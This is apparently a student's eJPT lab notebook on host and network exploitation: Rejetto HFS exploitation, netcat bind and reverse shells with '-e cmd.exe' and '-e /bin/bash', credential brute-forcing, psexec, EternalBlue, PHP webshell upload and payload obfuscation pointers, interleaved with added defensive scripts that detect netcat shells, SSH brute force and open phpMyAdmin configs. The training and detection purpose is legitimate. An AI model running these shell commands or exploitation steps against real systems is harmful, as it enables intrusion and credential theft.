EJPT9

The document outlines various techniques for host and network penetration testing, including banner grabbing, searching for exploits, and using tools like Searchsploit and Metasploit Framework. It details the process of exploiting vulnerable servers, including manual exploitation methods and using netcat for reverse shells. Additionally, it covers blackbox testing labs for both Windows and Linux environments, emphasizing enumeration, credential brute-forcing, and exploiting services like SMB and MySQL.

Uploaded by

theliinkworld

EJPT9:

Host & Network Penetration Testing: Exploitation:

BANNER GRABBING(lab):
Using banner grabbing to identify the services running on the target. It has an SSH
lab which was already done previously.
Using nmap for banner grabbing:
nmap -sV --script=banner ip
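Added example, not from these notes or the course: a small Python banner grabber plus a parser for the SSH identification string, which is the same text the nmap banner script reads on the SSH lab. The sample banners are constructed, and the host/port arguments to the grabber are assumptions.

```python
"""Added example, not from the eJPT notes: grab a TCP banner and parse it.
Sample banners are constructed; host/port are assumptions."""
import re
import socket

# Constructed sample banners (SSH follows RFC 4253: "SSH-protoversion-softwareversion SP comments").
SAMPLE_BANNERS = [
    b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n",
    b"SSH-1.99-OpenSSH_5.3\r\n",
    b"220 (vsFTPd 3.0.3)\r\n",
    b"",  # a service that waits for the client to speak first (e.g. HTTP)
]

SSH_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?: (?P<comment>.*))?$")


def grab_banner(host, port, timeout=3.0):
    """Connect and return the first bytes the service sends (b"" if it stays silent).
    Services like SSH/FTP/SMTP talk first; HTTP does not, so empty is normal there."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        try:
            return sock.recv(1024)
        except socket.timeout:
            return b""


def parse_ssh_banner(raw):
    """Split an SSH identification string into protocol version, software and comment.
    Returns None if the banner is not SSH."""
    first_line = raw.decode("ascii", errors="replace").split("\r\n", 1)[0].strip()
    match = SSH_RE.match(first_line)
    return match.groupdict() if match else None


def classify_banner(raw):
    """Coarse service family from the banner alone (constructed heuristics)."""
    if raw.startswith(b"SSH-"):
        return "ssh"
    if raw[:3].isdigit() and raw[3:4] in (b" ", b"-"):
        return "numeric-reply"  # FTP/SMTP style "220 ..." greeting
    if not raw:
        return "silent"
    return "unknown"


def inventory(banners):
    """Summarise a list of raw banners as (family, software) pairs."""
    rows = []
    for raw in banners:
        family = classify_banner(raw)
        ssh = parse_ssh_banner(raw)
        rows.append((family, ssh["software"] if ssh else None))
    return rows


if __name__ == "__main__":
    # offline run over the constructed banners; swap in grab_banner(host, port) for a live host
    for row in inventory(SAMPLE_BANNERS):
        print(row)
```

The parser keeps the protocol version separate from the software string on purpose: "SSH-1.99" means the server still accepts protocol 1 clients, which is worth noticing in an inventory even when the software version looks fine.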

From now on, if the video or lab has already been done I will skip it, and yeah, if anything new
comes up I will write it down, skipping nothing.
:)

Exploits:
The first part was about searching the publicly available exploits using exploit-db
and being careful to use verified exploits, as sometimes the exploits may have
malicious code inside them; we can also use Google dorks for searching for
exploits.
A useful website for getting news about exploits: packetstorm

SEARCHING EXPLOITS WITH SEARCHSPLOIT:

This section was about using searchsploit, how to copy exploits from it into our
current directory, etc. A good documentation on it:
https://blog.certcube.com/searchsploit-cheat-sheet/#:~:text=Searchsploit%20an%20exploit%20search%20tool,out%20copy%20of%20the%20repository.
To copy an exploit from searchsploit: searchsploit -m exploit number

FIXING EXPLOITS:

We will be exploiting a Windows vulnerable HTTP server, but this time using a manual
approach.
To do so we will use searchsploit:
the exploit we are going to use is the Rejetto HTTP vuln.
Let's copy the exploit from searchsploit to our root directory by searchsploit -m
exploit number
Then let's see what all needs to be configured etc.
We need to configure the IP address to our local IP address and the port number to the port
our netcat listener will use.
For it to work perfectly we need to host a Python HTTP server on our local machine,
and during exploitation the script asks us to host the netcat script
on the Python server, so we do so: copy the netcat script from the directory it is in to
our home directory and also start a netcat listener on any port by nc -nvlp port no.
Then we will start our server and use the command python exploit.py ip python
server port no, and it will download the netcat executable from our local machine,
which it will use to connect to the netcat listener we started earlier and give
us a reverse shell. Done.

SHELLS:
NETCAT FUNDAMENTALS(lab):

This lab is about netcat: using it to put our files onto the target system, interacting
with the target system, downloading files to the target, how to host using netcat, banner
grabbing etc.
To connect to a TCP port: nc -nv ip port
For UDP:
nc -nvu ip port
BIND SHELL():
It's about bind shells and executing them on the target system using netcat.
For executing an nc bind shell we will transfer our nc.exe to Windows by hosting a
server on Linux.
We have transferred nc.exe to the Windows machine; now we will use it to host a
bind shell: nc.exe -nvlp 1234 -e cmd.exe
Now connect from the Kali machine using the command nc -nv ip port
If we want to do the opposite (connect to Kali using Windows),
do
nc -nvlp port -e /bin/bash
and connect from the Windows system using nc.exe -nv ip port
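Added example, not from these notes or the course: the same bind/reverse shell command lines seen from the blue-team side. It classifies netcat invocations in process-creation events so a listener with -e/-c (bind shell) or a connect with -e/-c (reverse shell) gets flagged while a plain listener or client does not. The event format and the sample lines are constructed; the netcat flag sets are the documented nc/ncat options.

```python
"""Added example, not from the eJPT notes: flag netcat bind/reverse shell command lines
in process-creation events. The event format and sample lines are constructed."""
# Constructed process-creation events: "<timestamp> host=<h> user=<u> cmd=<command line>".
SAMPLE_EVENTS = """\
2024-01-10T10:00:01Z host=win01 user=bob cmd=nc.exe -nvlp 1234 -e cmd.exe
2024-01-10T10:00:05Z host=kali user=root cmd=nc -nv 192.0.2.15 1234
2024-01-10T10:01:00Z host=web01 user=www-data cmd=/usr/bin/nc -nv 192.0.2.9 4444 -e /bin/bash
2024-01-10T10:02:00Z host=web01 user=www-data cmd=ncat --exec /bin/sh 192.0.2.9 4445
2024-01-10T10:03:00Z host=kali user=root cmd=nc -nvlp 4444
2024-01-10T10:04:00Z host=web01 user=alice cmd=python3 exploit.py 192.0.2.15 8000
"""

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "nc64.exe"}
EXEC_SHORT = {"e", "c"}            # nc -e / ncat -c
EXEC_LONG = {"exec", "sh-exec"}    # ncat --exec / --sh-exec
LISTEN_LONG = {"listen"}           # ncat --listen


def classify_netcat(cmdline):
    """Return 'bind-shell', 'reverse-shell', 'listener', 'client', or None (not netcat).
    A real pipeline would use the EDR's already-parsed argv; whitespace split is enough here."""
    argv = cmdline.split()
    if not argv:
        return None
    prog = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if prog not in NETCAT_NAMES:
        return None
    short_flags, long_flags = set(), set()
    for tok in argv[1:]:
        if tok.startswith("--"):
            long_flags.add(tok[2:].split("=", 1)[0].lower())
        elif tok.startswith("-") and len(tok) > 1:
            short_flags.update(tok[1:])  # bundled options: "-nvlp" -> n, v, l, p
    listens = "l" in short_flags or bool(long_flags & LISTEN_LONG)
    execs = bool(short_flags & EXEC_SHORT) or bool(long_flags & EXEC_LONG)
    if listens and execs:
        return "bind-shell"
    if execs:
        return "reverse-shell"
    if listens:
        return "listener"
    return "client"


def parse_event(line):
    """Split a constructed event line into (timestamp, host, user, cmdline)."""
    head, _, cmd = line.partition(" cmd=")
    parts = head.split()
    if len(parts) != 3 or not cmd:
        return None
    ts, host, user = parts[0], parts[1].split("=", 1)[1], parts[2].split("=", 1)[1]
    return ts, host, user, cmd


def scan_events(text):
    """Return only the events where netcat is wired to a shell: (host, user, verdict, cmd)."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        _ts, host, user, cmd = ev
        verdict = classify_netcat(cmd)
        if verdict in ("bind-shell", "reverse-shell"):
            hits.append((host, user, verdict, cmd))
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

The point of splitting bundled short options is that "nc -nvlp 1234 -e cmd.exe" and "nc -l -p 1234 -e cmd.exe" are the same thing; a rule that only looks for the literal string "-e" next to "-l" misses the first form.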

FRAMEWORKS:
MSF FRAMEWORK(lab):

Found a login page for the ProcessMaker admin page, logged in using default creds and
searched in msf for modules, found one PHP module RCE, used it, got RCE and got the flag
from the machine, boom done.

POWERSHELL EMPIRE(no lab):

---

WINDOWS BLACKBOX:
This is a blackbox testing lab and it's like divided into different parts: one
section for enumeration, one for SSH exploitation, one for SMB exploitation, and
I'll try to solve all labs without the video or walkthrough, let's see.
I scanned the server and found many open ports. The first thing I did was exploit the FTP
server by using a brute-force attack and got the password for administrator.
Also found an SMB server, OpenSSH, Jenkins and Oracle fish; let's exploit further. Found
an OpenSSH server too, let's search for its exploits using searchsploit, and found a
username enumeration, nothing much; we will use SSH brute force, let's see, using hydra
for that.
We got a user vagrant and password vagrant, let's use it and log in.
We logged in, found nothing important, let's move forward and search something else.
Let's exploit SMB:
Brute-forcing SMB and found the pass for administrator: vagrant.
Let's use enum4linux to enumerate users and brute-force their passwords also.
Now that we have creds we can use psexec to gain remote access.
Got stuck here, forgot the usage of psexec :(
So we will have to copy psexec to our current directory and provide it executable
permissions:
cp /usr/share/psexec.py /root/Desktop and then chmod +x psexec.py
usage:
python3 psexec.py administrator@ip
and logged in.
We can also use the psexec module if we don't want this much hassle lol
use exploit/windows/smb/psexec
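Added example, not from these notes or the course: what the hydra SSH guessing above looks like from the target's side, as a small detector over sshd auth-log lines. It keeps a sliding window of failures per source IP, raises one "bruteforce" alert when the burst crosses a threshold, and a second alert when a login then succeeds from the same source (the vagrant:vagrant moment). The log lines are constructed and the thresholds are assumptions.

```python
"""Added example, not from the eJPT notes: spot an SSH password-guessing run in sshd
auth-log lines. The log lines are constructed; the thresholds are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt: one source guesses five times in three seconds, then succeeds.
SAMPLE_LOG = """\
Jan 10 09:00:01 lab sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 50001 ssh2
Jan 10 09:00:02 lab sshd[1202]: Failed password for invalid user test from 192.0.2.10 port 50002 ssh2
Jan 10 09:00:02 lab sshd[1203]: Failed password for root from 192.0.2.10 port 50003 ssh2
Jan 10 09:00:03 lab sshd[1204]: Failed password for vagrant from 192.0.2.10 port 50004 ssh2
Jan 10 09:00:03 lab sshd[1205]: Failed password for vagrant from 192.0.2.10 port 50005 ssh2
Jan 10 09:00:04 lab sshd[1206]: Accepted password for vagrant from 192.0.2.10 port 50006 ssh2
Jan 10 09:05:00 lab sshd[1300]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Jan 10 09:05:30 lab sshd[1301]: Accepted password for alice from 198.51.100.7 port 40002 ssh2
Jan 10 09:06:00 lab CRON[1400]: pam_unix(cron:session): session opened for user root
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    """Return {'ts', 'raw_ts', 'result', 'user', 'ip'} for an sshd password event, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; good enough for deltas within one file
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return {"ts": ts, "raw_ts": m.group("ts"), "result": m.group("result"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(log_text, threshold=5, window_s=60, success_min_failures=3):
    """Sliding-window count of failures per source IP.
    Emits 'bruteforce' once per IP when failures in the window reach `threshold`, and
    'success-after-failures' when a login succeeds from an IP with a recent failure burst."""
    failures = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        window = failures[ip]
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if ev["result"] == "Failed":
            window.append(ts)
            if len(window) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip, "count": len(window), "at": ev["raw_ts"]})
        elif len(window) >= success_min_failures:
            alerts.append({"type": "success-after-failures", "ip": ip, "user": ev["user"],
                           "failures": len(window), "at": ev["raw_ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert type is the one worth paging on: a burst of failures is noise on any internet-facing box, a success right after a burst is a guessed password.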

Next is MySQL DB enumeration:

Btw these blackboxes should be one blackbox-type lab only, not different parts;
it should be like the blackboxes were in the previous eJPTv1 course, much better.
Let's exploit MySQL.
Also the blackboxes previously were much, much better and harder :( didn't expect this; doing
THM and HTB is recommended.
We will first try brute-forcing the creds using msf.
And root has no password, like anonymous login; logged in and finished the lab. Also
when I saw the video I remembered that I also discovered a phpMyAdmin directory
which we weren't able to access because it was allowed only for localhost, so we
will just use EternalBlue and edit the Apache conf file.
To do so let's find the apache.conf file.
We aren't allowed to modify it within the system, so we will just download it,
update it and upload it to the session, and msf will replace the file with our uploaded
file.
We can find some juicy info about WordPress here, maybe helpful for the exam,
in this dir: C:\wamp\www\wordpress
Now the Apache conf file; we will get it here:
c:\wamp\alias\phpmyadmin.conf
and edit the IP to use "all" so it will allow everyone to access it.
And to get it updated we will restart the Apache service:
net stop wampapache
net start wampapache
And done, we can access the phpMyAdmin panel.
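Added example, not from these notes or the course: a config check that catches exactly the edit above, a phpMyAdmin alias whose access rule was widened from loopback to "all". It parses Apache <Directory> blocks and reports any Allow/Require rule that reaches beyond 127.0.0.1/::1, in both the 2.2 (Order/Allow/Deny) and 2.4 (Require) syntax. The config text is constructed in the style of WAMP's alias files, not copied from a real install.

```python
"""Added example, not from the eJPT notes: audit Apache <Directory> access rules so that a
phpMyAdmin alias opened to "all" gets flagged. Config text is constructed, WAMP-style."""
import re

# Constructed: loopback-only access, Apache 2.2 style (Order/Deny/Allow).
LOCALHOST_ONLY = """\
Alias /phpmyadmin "c:/wamp/apps/phpmyadmin/"
<Directory "c:/wamp/apps/phpmyadmin/">
    Options Indexes FollowSymLinks MultiViews
    AllowOverride all
    Order Deny,Allow
    Deny from all
    Allow from 127.0.0.1
</Directory>
"""

# The same block after the "use all" edit from the notes: reachable from any source.
OPEN_TO_EVERYONE = LOCALHOST_ONLY.replace("Allow from 127.0.0.1", "Allow from all")

# Apache 2.4 style: 'Require local' is the safe form, 'Require all granted' the open one.
OPEN_24 = """\
Alias /phpmyadmin "c:/wamp/apps/phpmyadmin/"
<Directory "c:/wamp/apps/phpmyadmin/">
    Require all granted
</Directory>
"""

BLOCK_RE = re.compile(r'<Directory\s+"?([^">]+?)"?\s*>(.*?)</Directory>', re.S | re.I)
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_access(conf_text):
    """Return findings for every <Directory> whose access rules reach beyond loopback.
    Each finding: {'path', 'directive', 'reason'}."""
    findings = []
    for block in BLOCK_RE.finditer(conf_text):
        path, body = block.group(1), block.group(2)
        for raw in body.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            low = line.lower()
            if low in ("allow from all", "require all granted"):
                findings.append({"path": path, "directive": line,
                                 "reason": "grants access from any source"})
            elif low.startswith("allow from ") or low.startswith("require ip "):
                # anything listed that is not a loopback address widens the exposure
                remote = [h for h in line.split()[2:] if h.lower() not in LOOPBACK]
                if remote:
                    findings.append({"path": path, "directive": line,
                                     "reason": "grants access beyond loopback: " + ", ".join(remote)})
    return findings


def is_loopback_only(conf_text):
    """True when no <Directory> block in the text reaches beyond loopback."""
    return not audit_access(conf_text)


if __name__ == "__main__":
    for name, conf in (("localhost-only", LOCALHOST_ONLY), ("open", OPEN_TO_EVERYONE), ("open-2.4", OPEN_24)):
        print(name, audit_access(conf))
```

Run it against the real c:\wamp\alias\phpmyadmin.conf after the lab to confirm the loopback restriction was put back; a phpMyAdmin panel left reachable from everywhere is exactly the kind of foothold the earlier MySQL step exploited.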

LINUX BLACK BOX:

Let's start; this is similar to the previous one, I mean different parts.
We will first do the scanning, finding open ports, then doing
The Nmap scan reveals that we have many services running such as OpenSSH, vsftpd,
telnet, Samba, MySQL, PostgreSQL, Apache Tomcat.
Let's enumerate, starting with Samba:
using enum4linux for getting the users and shares;
we got a list of them.
I tried brute-forcing but no luck, let's try FTP.
Also I found a phpMyAdmin login page and Apache Tomcat also.
With a little bit of searching I found a WebDAV directory
and used the WebDAV upload PHP msf module to get an msf shell.
A Linux machine RCE; will try to find if anything interesting is in there.
Nothing useful, saw all the config files, nothing much there; now trying FTP.
Brute force didn't work but we do have anonymous login, let's log in and see what's
interesting in it.
And found a vsftpd module but it didn't work as it's patched. I tried brute-forcing
again with the unix_users wordlist and this time found one account called service
account; let's log in with that and see if we can do something like upload, download etc.
We can upload files so yeah, let's get a meterpreter session.
Open the FTP session and upload our PHP webshell in the /var/www/dav directory
and open it using the web browser and get our session on netcat.

Now we will exploit PHP; had to see the solution for this one, it's easy I know yeah but was
confused about something :(
Using the PHP msf module for CGI injection
and get a meterpreter shell.
We can also use this msf module to exploit Samba; use
exploit/multi/samba/usermap_script.
Done Linux blackbox.

OBFUSCATION(no lab):

AV EVASION WITH SHELLTER:

OBFUSCATION WITH POWERSHELL CODE:

Obfuscating an msfvenom shell with PowerShell scripts; use your own sources or this:
https://medium.com/@SecureTacticsTS/simple-but-effective-powershell-obfuscation-techniques-b38900d8f7dd
